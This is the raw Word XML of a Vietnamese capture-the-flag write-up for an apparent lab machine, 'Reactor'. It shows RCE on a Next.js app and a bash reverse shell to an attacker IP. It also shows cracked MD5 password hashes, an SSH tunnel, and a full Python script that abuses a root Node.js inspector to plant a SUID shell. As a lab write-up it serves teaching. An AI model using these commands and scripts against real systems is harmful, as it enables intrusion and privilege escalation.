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195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1. Reconnaissance — Quét cổng với Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D491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Đầu tiên, thực hiện quét cổng trên máy target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10.129.42.216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bằng Nmap để xác định các dịch vụ đang mở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740B22D5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1135" cy="2920365"/>
            <wp:effectExtent l="0" t="0" r="19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36C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2. Vulnerability Scanning — Quét lỗ hổng với Nuclei</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15958D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Tiếp theo, dùng Nuclei để quét lỗ hổng trên port 3000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EFF7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Nuclei phát hiện CVE liên quan đến React/Next.js — đây là lỗ hổng RCE (Remote Code Execution) trên component React server-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579BCF4">
      <w:pPr>
        <w:ind w:left="100" w:hanging="130" w:hangingChars="5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3515" cy="1384935"/>
            <wp:effectExtent l="0" t="0" r="952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0D1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3. Khai thác RCE — React2Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAEC93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Sử dụng công cụ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/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react2shell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để khai thác lỗ hổng CVE vừa tìm thấy, gửi payload RCE tới ứng dụng trên port 3000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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501F09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Khai thác thành công, có thể thực thi lệnh từ xa trên máy target với quyền user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node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(uid 999).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7A6B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3515" cy="2293620"/>
            <wp:effectExtent l="0" t="0" r="952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008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4. Kiểm tra RCE — Test lệnh cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8698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Thử thực thi các lệnh cơ bản để xác nhận RCE đang hoạt động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C06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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D19E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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E97CD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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D399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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210FF7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Kết quả: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whoami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trả về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node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, xác nhận đã có quyền thực thi lệnh trên máy target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED5718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254190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FC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5. Tạo Reverse Shell — Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F68B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Để thuận tiện cho việc khai thác, thiết lập reverse shell qua netcat về máy Kali trên port 4444:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34311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# Máy Kali (lắng nghe):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6783B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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B89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3A20E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# Trên target (qua RCE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BA3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bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.23/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D48D4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Đã nhận được reverse shell thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA242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0231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64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6. Enumeration — Khám phá database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E629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Trong quá trình enumeration, phát hiện file khả nghi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reactor.db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. Dùng lệnh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strings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để kiểm tra loại database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784DB9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strings reactor.db | head -50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76A85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Kết quả cho thấy đây là database </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/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SQLite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, và xuất hiện các chuỗi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admin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và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engineer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— gợi ý tồn tại bảng users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4416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605405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9B386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Kết quả thu được tài khoản, mật khẩu được lưu dưới dạng hash , role, email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B24C00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1|admin|a203b22191d744a4e70ada5c101b17b8|administrator|admin@reactor.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E555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instrText xml:space="preserve"> HYPERLINK "mailto:2|engineer|39d97110eafe2a9a68639812cd271e8e|operator|engineer@reactor.htb" </w:instrTex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7"/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2|engineer|39d97110eafe2a9a68639812cd271e8e|operator|engineer@reactor.htb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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CAB57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8. Crack hash — Lấy mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465588E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Hai mật khẩu được lưu dưới dạng hash MD5 (32 ký tự hex). Dùng hashcat hoặc online cracker để crack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. Ở đây, sử dụng crackstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D81B303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3040" cy="263271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2942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1610" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="1143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A027F">
      <w:pP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Kết quả: crack thành công mật khẩu của tài khoản </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/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engineer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. Tài khoản admin không crack được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D94C1F">
      <w:pP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P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assword của engineer là : reactor1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A100A">
      <w:pP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74115E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9. SSH vào máy target — Lấy User Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018A94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Vì từ bước Nmap đã thấy port 22 (SSH) mở, thử SSH vào máy target với tài khoản engineer vừa lấy được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C8B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ssh engineer@10.129.42.216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558744E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Đăng nhập thành công. Thực hiện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ls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và thấy file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user.txt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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DB882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Tiếp tục đọc file user flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084A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cat user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3699A6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Đã thu được </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/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User Flag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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C5E26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E57AF3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906905"/>
            <wp:effectExtent l="0" t="0" r="444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38E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10. Privilege Escalation — Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152FAF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Thử các phương pháp leo quyền cơ bản (sudo -l, SUID, cron...) nhưng không thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977CB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Kiểm tra các tiến trình đang chạy với quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757D73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ps aux | grep root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AD3EB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Phát hiện tiến trình quan trọng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C4B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eastAsia="Courier New" w:cs="Times New Roman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root  1411  0.0  1.1  1066540  46384  ?  Ssl  08:44  0:00  /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB10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Phân tích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A010E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80" w:leftChars="0" w:right="0" w:rightChars="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/usr/bin/node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— tiến trình Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DF62D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80" w:leftChars="0" w:right="0" w:rightChars="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--inspect=127.0.0.1:9229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— Node.js Inspector đang bật, bind trên localhost port 9229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582949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80" w:leftChars="0" w:right="0" w:rightChars="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Tiến trình chạy với quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965F6D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80" w:leftChars="0" w:right="0" w:rightChars="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Bất kỳ ai kết nối được vào port 9229 đều có thể thao túng tiến trình qua </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/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Chrome DevTools Protocol (CDP)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— không cần mật khẩu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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082FFB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80" w:leftChars="0" w:right="0" w:rightChars="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Vì tiến trình chạy as root, mọi lệnh JavaScript gửi vào (kể cả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child_process.execSync()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) đều thực thi với quyền root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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91D628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4310" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="13970" b="444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B4E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389255"/>
            <wp:effectExtent l="0" t="0" r="6985" b="698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29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11. SSH Tunnel — Đưa Inspector ra ngoài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288C8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Node Inspector chỉ listen trên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127.0.0.1:9229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(localhost của máy target), không thể truy cập trực tiếp từ máy Kali. Dùng SSH tunnel để chuyển port:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B5A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ssh -L 8000:127.0.0.1:9229 engineer@10.129.42.216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3493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SSH server trên Reactor đóng vai trò trung gian:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473206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80" w:leftChars="0" w:right="0" w:rightChars="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Mọi traffic gửi vào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127.0.0.1:8000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trên máy Kali → được đóng gói qua SSH → chuyển tới Reactor → SSH server tự kết nối tới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127.0.0.1:9229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52550A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80" w:leftChars="0" w:right="0" w:rightChars="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Dưới góc nhìn của Node Inspector, request đến từ localhost → chấp nhận kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719059C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055" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="6985" b="571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25E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12. Khai thác Node Inspector — CDP Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED4068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Mở terminal mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FDE1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Sau khi tunnel SSH hoạt động, gửi request tới Node Inspector để lấy thông tin debug session hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D302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915035"/>
            <wp:effectExtent l="0" t="0" r="635" b="1460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ạo file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exploit.py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với nội dung bên dưới và chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DF8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python3 exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C894B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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B33A52C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import websocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D71424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import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BD14BD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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C904E6F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E7A05B6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WS_URL = "ws://127.0.0.1:8000/d0589be3-8cb9-45cc-afe1-cce124062ac4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A499C79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993C90C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def send(ws, msg_id, expression, await_promise=False):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0747ECC4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payload = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B59DE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"id": msg_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4673F6E0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"method": "Runtime.evaluate",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D02DC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"params": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637DB50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"expression": expression,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C8E34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"awaitPromise": await_promise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5703ED52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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC72209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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618FE79E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ws.send(json.dumps(payload))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52491B97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return json.loads(ws.recv())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32D35C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50A6AC29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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3AE9E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ws = websocket.create_connection(WS_URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF6F55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2AF0FA0C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# Bước 1: liệt kê global để biết context có gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEE7CFC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r = send(ws, 1, "Object.keys(globalThis)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29066E37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print("[*] globalThis keys:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F457604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print(json.dumps(r, indent=2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601BCA8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print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E912362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6064BA9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# Bước 2: thử lấy require qua process.mainModule (CommonJS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC6EA4E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r = send(ws, 2, "typeof process !== 'undefined' ? Object.keys(process) : 'no process'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165844B9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print("[*] process keys (nếu có):")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD6178F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print(json.dumps(r, indent=2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977F554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print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2AEA2C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64B90B9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# Bước 3: thử exploit chính - cp bash + chmod suid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABFAB5E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payload_cmd = "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A671F55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attempts = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5678AE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f"require('child_process').execSync('{payload_cmd}')",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F0293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f"process.mainModule.require('child_process').execSync('{payload_cmd}')",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EFA859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f"process.binding('spawn_sync')",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAD1384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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332CCE80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78F0C01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for i, expr in enumerate(attempts, start=3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D6DAF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print(f"[*] Thử payload #{i-2}: {expr}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B9441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r = send(ws, i, expr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58447860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print(json.dumps(r, indent=2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689BECD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if "exceptionDetails" not in r.get("result", {}):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7461AF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    print("[+] Có vẻ THÀNH CÔNG, không có exception!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A1C35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    print()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B451CDA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6643FE0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ws.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE46E7B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13EB3BB8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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7980D926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    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E340072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728640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Script thực hiện 3 bước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6599A4F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80" w:right="0" w:hanging="36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Liệt kê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globalThis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để xem context có gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7549B1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80" w:right="0" w:hanging="36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Kiểm tra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process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object — xác nhận có thể truy cập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process.mainModule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E274EE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80" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="GeistSans Fallback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Gửi payload qua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Runtime.evaluate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: copy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/bin/bash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→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/tmp/rootbash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và set SUID bit (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chmod 4755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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB8A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Payload thành công thông qua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process.mainModule.require('child_process').execSync(...)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— chạy lệnh shell với quyền root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505F85D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0D475440">
      <w:pPr>
        <w:ind w:firstLine="180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</w:p>
    <w:p w14:paraId="492D488A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8595" cy="1071245"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1079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2F5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13. Lấy Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B05DE0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Sau khi exploit thành công, kiểm tra file đã được tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDF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ls -la /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB19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Thấy file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/tmp/rootbash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với SUID bit (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-rwsr-xr-x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). Thực thi với flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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-p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để giữ quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CBEF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/tmp/rootbash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068E4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 xml:space="preserve">Đã có shell với quyền root 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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489FC26B">
      <w:pP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</w:p>
    <w:p w14:paraId="7F9269DF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603250"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350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40249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865" cy="471170"/>
            <wp:effectExtent l="0" t="0" r="3175" b="127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6B3ED9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14. Root Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A37F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Courier New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Tìm file root.txt và đọc nội dung:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DB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find / -name "root.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB6D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color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0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cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286CD9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Đã thu được </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="GeistSans Fallback" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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Root Flag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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="GeistSans Fallback" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD8E757">
      <w:pP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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3AFA7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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19700" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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ist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92E9CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B092E9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7A3A0E"/>
    <w:rsid w:val="0145478B"/>
    <w:rsid w:val="04567CE7"/>
    <w:rsid w:val="086A71DD"/>
    <w:rsid w:val="1DCC746F"/>
    <w:rsid w:val="32E9020C"/>
    <w:rsid w:val="475D6794"/>
    <w:rsid w:val="54452462"/>
    <w:rsid w:val="577A3A0E"/>
    <w:rsid w:val="5D105DFA"/>
    <w:rsid w:val="68AC0C4A"/>
    <w:rsid w:val="6D4059F2"/>
    <w:rsid w:val="75D5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924</Words>
  <Characters>4824</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>713</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5857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2026-06-28T08:53:00Z</dcterms:created>
  <dc:creator>Tú Ngô</dc:creator>
  <cp:lastModifiedBy>Tú Ngô</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-03T14:19:05Z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C080C57ABCA24A619153E7489D8FB1F7_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMzcyODMxYTE0ZTc0ZGU3Y2QwODc3MzYzN2Q1YmNiM2EiLCJ1c2VySWQiOiIxMzkyMTA4NDM5NDU0In0=</vt:lpwstr>
  </property>
</Properties>
</file>